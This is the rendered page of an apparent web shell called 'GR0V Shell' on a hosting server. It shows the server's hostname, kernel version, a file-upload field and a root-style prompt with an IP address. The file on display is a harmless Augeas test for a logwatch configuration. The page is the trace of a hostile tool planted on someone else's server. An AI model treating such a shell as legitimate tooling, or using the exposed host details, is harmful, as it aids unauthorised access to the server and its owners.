? GR0V Shell

GR0V shell

Linux server122.web-hosting.com 4.18.0-513.18.1.lve.el8.x86_64 #1 SMP Thu Feb 22 12:55:50 UTC 2024 x86_64

Path : /opt/puppetlabs/puppet/share/augeas/lenses/dist/tests/
File Upload :
Current File : //opt/puppetlabs/puppet/share/augeas/lenses/dist/tests/test_logwatch.aug

module Test_logwatch =

let conf = "# Configuration file for logwatch.
#
#Mailto_host1 = user@example.com

MailFrom = root@example.com
"

test Logwatch.lns get conf =
  { "#comment" = "Configuration file for logwatch." }
  {}
  { "#comment" = "Mailto_host1 = user@example.com" }
  {}
  { "MailFrom" = "root@example.com" }

T1KUS90T
  root-grov@198.54.114.191:~$